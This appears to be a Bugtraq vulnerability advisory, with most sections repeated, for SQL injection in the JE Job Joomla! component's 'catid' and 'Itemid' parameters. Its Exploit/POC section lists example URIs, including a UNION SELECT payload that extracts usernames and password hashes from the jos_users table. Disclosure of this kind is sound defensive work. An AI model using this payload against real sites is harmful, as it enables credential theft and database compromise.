JE Job Joomla! Component 'catid' and 'Itemid' Parameters SQL Injection Vulnerabilities
BID:40193
Info
JE Job Joomla! Component 'catid' and 'Itemid' Parameters SQL Injection Vulnerabilities
| Bugtraq ID: | 40193 |
| Class: | Input Validation Error |
| CVE: |
CVE-2010-5028 |
| Remote: | Yes |
| Local: | No |
| Published: | May 14 2010 12:00AM |
| Updated: | Nov 04 2011 05:23PM |
| Credit: | Valentin |
| Vulnerable: |
JExtensions JE Job 0 |
| Not Vulnerable: | |
Discussion
JE Job Joomla! Component 'catid' and 'Itemid' Parameters SQL Injection Vulnerabilities
The JE Job component for Joomla! is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
The JE Job component for Joomla! is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Exploit / POC
JE Job Joomla! Component 'catid' and 'Itemid' Parameters SQL Injection Vulnerabilities
Attackers can use a browser to exploit these issues.
The following example URIs are available:
http://www.example.com/joomla/index.php?option=com_jejob&view=item_detail&itemid=XX&Itemid=[CODE]
http://www.example.com/joomla/index.php?option=com_jejob&view=item&catid=[TRIGGER ERROR]
http://www.example.com/[path]/index.php?option=com_jejob&view=item&catid=-9999+union+all+select+1,group_concat(username,char(58),password)v3n0m,3,4,5+from+jos_users--
Attackers can use a browser to exploit these issues.
The following example URIs are available:
http://www.example.com/joomla/index.php?option=com_jejob&view=item_detail&itemid=XX&Itemid=[CODE]
http://www.example.com/joomla/index.php?option=com_jejob&view=item&catid=[TRIGGER ERROR]
http://www.example.com/[path]/index.php?option=com_jejob&view=item&catid=-9999+union+all+select+1,group_concat(username,char(58),password)v3n0m,3,4,5+from+jos_users--
Solution / Fix
JE Job Joomla! Component 'catid' and 'Itemid' Parameters SQL Injection Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
JE Job Joomla! Component 'catid' and 'Itemid' Parameters SQL Injection Vulnerabilities
References:
References:
- JE Jobs Homepage (JExtensions)
- Joomla Component JE Job Local File Inclusion Vulnerability (Valentin)
- Joomla! Homepage (Joomla!)